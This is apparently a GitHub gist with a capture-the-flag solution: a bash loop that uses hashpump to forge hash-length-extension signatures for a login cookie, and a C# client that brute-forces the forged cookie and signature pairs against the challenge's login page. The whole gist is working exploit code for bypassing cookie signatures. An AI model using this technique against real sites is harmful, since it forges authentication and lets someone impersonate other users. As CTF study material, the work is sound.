Skip to content

Instantly share code, notes, and snippets.

@key-moon
Last active Sep 8, 2018
Embed
What would you like to do?
for i in `seq 1 100`
do
hashpump -s a0750196b7aa295dba2811b19107f65c -d "logged_in=1%26id%3dguest" -k $i -a "&id=Kana"
done
class P
{
static WebClient client = new WebClient();
static void Main()
{
WebClient client = new WebClient();
client.CachePolicy = new System.Net.Cache.RequestCachePolicy(System.Net.Cache.RequestCacheLevel.NoCacheNoStore);
client.Headers = new WebHeaderCollection();
//SendReq("logged_in=1&id=guest", "a0750196b7aa295dba2811b19107f65c");
//return;
using (StreamReader reader = new StreamReader("data-signature.txt"))
{
while (!reader.EndOfStream)
{
string sig = reader.ReadLine();
string dataCookie = reader.ReadLine();
SendReq(DecodeStr(dataCookie), sig);
}
}
}
static void SendReq(string dataCookie,string signature)
{
client.Headers.Clear();
var cookie = $"Cookie:DataCookie={dataCookie}; Signature={signature}";
Debug.WriteLine(cookie);
client.Headers.Add(cookie);
var s = Encoding.UTF8.GetString(client.DownloadData("http://signature.cyberrebeat.adctf.online/login.php"));
if (s.Contains("Login failed : invalid signature!")) Console.WriteLine("fail");
else Console.WriteLine($"success : {s}");
}
static string DecodeStr(string s)
{
string res = "";
for (int i = 0; i < s.Length; i++)
{
if(s[i] != '\\')
{
res += s[i];
continue;
}
res += $"%{s.Substring(i + 2, 2)}";
i += 3;
}
res = res.Replace("%", "%25");
return res;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment